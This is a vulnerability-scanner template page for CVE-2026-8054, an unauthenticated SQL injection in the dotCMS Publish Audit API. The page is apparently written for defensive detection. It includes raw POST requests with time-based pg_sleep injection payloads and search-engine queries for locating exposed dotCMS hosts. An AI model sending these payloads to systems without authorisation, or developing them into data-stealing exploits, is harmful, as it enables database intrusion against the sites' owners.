dotCMS Core Publish Audit API - Unauthenticated SQL Injection
CVE-2026-8054
Verified
Description
dotCMS Core 25.11.04-1 through 26.04.28-02 contains an SQL injection caused by unsanitized input in Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll), letting remote unauthenticated attackers read, modify, or destroy arbitrary database content, exploit requires no authentication.
Severity
Critical
Affected Product
dotcms
Published Date
June 9, 2026
Template Author
dhiyaneshdk
CVE-2026-8054.yaml
id: CVE-2026-8054
info:
name: dotCMS Core Publish Audit API - Unauthenticated SQL Injection
author: DhiyaneshDk
severity: critical
description: |
dotCMS Core 25.11.04-1 through 26.04.28-02 contains an SQL injection caused by unsanitized input in Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll), letting remote unauthenticated attackers read, modify, or destroy arbitrary database content, exploit requires no authentication.
impact: |
Remote attackers can read, modify, or destroy arbitrary database content, potentially compromising the entire database.
remediation: |
Upgrade to dotCMS Core 26.04.28-03 or later.
reference:
- https://github.com/advisories/GHSA-jpx3-25r2-jq5g
- https://github.com/dotCMS/core/pull/35553
- https://dev.dotcms.com/docs/known-security-issues?issueNumber=SI-75
metadata:
max-request: 2
vendor: dotcms
product: dotcms
shodan-query: http.title:"dotcms"
fofa-query: title="dotcms"
google-query: intitle:"dotcms"
tags: cve,cve2026,dotcms,sqli,unauth,time-based,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/auditPublishing/getAll HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
["x' || (SELECT CASE WHEN 1=2 THEN pg_sleep(0)::text ELSE '' END) || '"]
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(content_type, 'application/json')"
- "contains(body, '[]')"
condition: and
internal: true
- raw:
- |
@timeout: 15s
POST /api/auditPublishing/getAll HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json
["x' || (SELECT CASE WHEN 1=1 THEN pg_sleep(5)::text ELSE '' END) || '"]
matchers:
- type: dsl
dsl:
- "duration>=5"
- "status_code == 200"
- "contains(content_type, 'application/json')"
- "contains(body, '[]')"
condition: and
# digest: 4a0a0047304502206353978d3f1babdbe78c719242ffd86344e79159433b089fabad34084f1ac8bc022100a3ddda615cad914cbb269bca5694a0aa29e5be38745a7d7d8c50b81e2f9a5f59:922c64590222798bb761d5b6d8e72950Remediation Steps
Upgrade to dotCMS Core 26.04.28-03 or later.